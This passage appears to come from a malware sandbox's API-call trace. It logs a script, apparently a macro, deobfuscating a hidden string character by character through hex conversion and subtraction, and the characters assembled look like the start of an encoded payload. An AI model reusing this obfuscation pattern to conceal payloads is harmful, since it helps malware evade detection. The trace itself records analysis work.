pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.862] GetUserDefaultLCID () returned 0x409 [0174.862] malloc (_Size=0xa0) returned 0x11f50080 [0174.863] free (_Block=0x11f50080) [0174.863] VarBstrCat (in: bstrLeft="&H", bstrRight="b6", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.863] GetUserDefaultLCID () returned 0x409 [0174.863] VarI2FromStr (in: strIn="&Hb6", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.863] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="Q") returned 1 [0174.863] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.863] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.863] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.864] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.864] GetUserDefaultLCID () returned 0x409 [0174.864] malloc (_Size=0xa0) returned 0x11f50080 [0174.864] free (_Block=0x11f50080) [0174.864] VarBstrCat (in: bstrLeft="&H", bstrRight="97", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.864] GetUserDefaultLCID () returned 0x409 [0174.864] VarI2FromStr (in: strIn="&H97", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.864] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.865] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.865] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.865] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.865] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.865] GetUserDefaultLCID () returned 0x409 [0174.865] malloc (_Size=0xa0) returned 0x11f50080 [0174.865] free (_Block=0x11f50080) [0174.865] VarBstrCat (in: bstrLeft="&H", bstrRight="b4", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.865] GetUserDefaultLCID () returned 0x409 [0174.866] VarI2FromStr (in: strIn="&Hb4", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.866] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.866] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.866] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.866] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.866] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.866] GetUserDefaultLCID () returned 0x409 [0174.866] malloc (_Size=0xa0) returned 0x11f50080 [0174.867] free (_Block=0x11f50080) [0174.867] VarBstrCat (in: bstrLeft="&H", bstrRight="bc", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.867] GetUserDefaultLCID () returned 0x409 [0174.867] VarI2FromStr (in: strIn="&Hbc", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.867] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="M") returned 1 [0174.867] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.867] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.867] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.867] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.867] GetUserDefaultLCID () returned 0x409 [0174.868] malloc (_Size=0xa0) returned 0x11f50080 [0174.868] free (_Block=0x11f50080) [0174.868] VarBstrCat (in: bstrLeft="&H", bstrRight="90", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.868] GetUserDefaultLCID () returned 0x409 [0174.868] VarI2FromStr (in: strIn="&H90", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.868] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.868] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.868] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.869] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.869] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.869] GetUserDefaultLCID () returned 0x409 [0174.869] malloc (_Size=0xa0) returned 0x11f50080 [0174.869] free (_Block=0x11f50080) [0174.869] VarBstrCat (in: bstrLeft="&H", bstrRight="b1", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.869] GetUserDefaultLCID () returned 0x409 [0174.869] VarI2FromStr (in: strIn="&Hb1", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.869] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.870] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.870] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.870] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.870] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.870] GetUserDefaultLCID () returned 0x409 [0174.870] malloc (_Size=0xa0) returned 0x11f50080 [0174.870] free (_Block=0x11f50080) [0174.870] VarBstrCat (in: bstrLeft="&H", bstrRight="ae", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.870] GetUserDefaultLCID () returned 0x409 [0174.870] VarI2FromStr (in: strIn="&Hae", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="m\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.871] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.871] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.871] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.871] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.871] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.871] GetUserDefaultLCID () returned 0x409 [0174.871] malloc (_Size=0xa0) returned 0x11f50080 [0174.871] free (_Block=0x11f50080) [0174.872] VarBstrCat (in: bstrLeft="&H", bstrRight="a6", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.872] GetUserDefaultLCID () returned 0x409 [0174.872] VarI2FromStr (in: strIn="&Ha6", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.872] GetAsyncKeyState (vKey=27) returned 0 [0174.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.872] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9655438, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.873] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.873] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.873] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.873] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.873] GetUserDefaultLCID () returned 0x409 [0174.873] malloc (_Size=0xa0) returned 0x11f50080 [0174.873] free (_Block=0x11f50080) [0174.873] VarBstrCat (in: bstrLeft="&H", bstrRight="93", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.873] GetUserDefaultLCID () returned 0x409 [0174.873] VarI2FromStr (in: strIn="&H93", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.874] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0174.874] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.874] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.874] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x1 [0174.874] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.874] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.874] GetUserDefaultLCID () returned 0x409 [0174.874] malloc (_Size=0xa0) returned 0x11f50080 [0174.874] free (_Block=0x11f50080) [0174.875] VarBstrCat (in: bstrLeft="&H", bstrRight="b2", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.875] GetUserDefaultLCID () returned 0x409 [0174.875] VarI2FromStr (in: strIn="&Hb2", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.875] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.875] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.875] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.876] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.876] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.876] GetUserDefaultLCID () returned 0x409 [0174.876] malloc (_Size=0xa0) returned 0x11f50080 [0174.876] free (_Block=0x11f50080) [0174.876] VarBstrCat (in: bstrLeft="&H", bstrRight="af", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.876] GetUserDefaultLCID () returned 0x409 [0174.876] VarI2FromStr (in: strIn="&Haf", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.877] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.877] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.877] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.877] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.877] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.877] GetUserDefaultLCID () returned 0x409 [0174.877] malloc (_Size=0xa0) returned 0x11f50080 [0174.877] free (_Block=0x11f50080) [0174.877] VarBstrCat (in: bstrLeft="&H", bstrRight="9b", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.878] GetUserDefaultLCID () returned 0x409 [0174.878] VarI2FromStr (in: strIn="&H9b", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.878] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.878] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.878] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.878] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.878] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.878] GetUserDefaultLCID () returned 0x409 [0174.878] malloc (_Size=0xa0) returned 0x11f50080 [0174.878] free (_Block=0x11f50080) [0174.879] VarBstrCat (in: bstrLeft="&H", bstrRight="a6", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.879] GetUserDefaultLCID () returned 0x409 [0174.879] VarI2FromStr (in: strIn="&Ha6", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.879] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.879] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.879] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.879] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.879] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.879] GetUserDefaultLCID () returned 0x409 [0174.879] malloc (_Size=0xa0) returned 0x11f50080 [0174.879] free (_Block=0x11f50080) [0174.880] VarBstrCat (in: bstrLeft="&H", bstrRight="85", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.880] GetUserDefaultLCID () returned 0x409 [0174.880] VarI2FromStr (in: strIn="&H85", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.880] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0174.880] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.880] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.880] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.880] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.880] GetUserDefaultLCID () returned 0x409 [0174.881] malloc (_Size=0xa0) returned 0x11f50080 [0174.881] free (_Block=0x11f50080) [0174.881] VarBstrCat (in: bstrLeft="&H", bstrRight="a2", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.881] GetUserDefaultLCID () returned 0x409 [0174.881] VarI2FromStr (in: strIn="&Ha2", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.881] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0174.881] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.881] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.882] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.882] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.882] GetUserDefaultLCID () returned 0x409 [0174.882] malloc (_Size=0xa0) returned 0x11f50080 [0174.882] free (_Block=0x11f50080) [0174.882] VarBstrCat (in: bstrLeft="&H", bstrRight="a7", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.882] GetUserDefaultLCID () returned 0x409 [0174.882] VarI2FromStr (in: strIn="&Ha7", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.882] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="8") returned 1 [0174.883] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.883] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.883] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.883] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.883] GetUserDefaultLCID () returned 0x409 [0174.883] malloc (_Size=0xa0) returned 0x11f50080 [0174.883] free (_Block=0x11f50080) [0174.883] VarBstrCat (in: bstrLeft="&H", bstrRight="90", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.883] GetUserDefaultLCID () returned 0x409 [0174.883] VarI2FromStr (in: strIn="&H90", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.884] 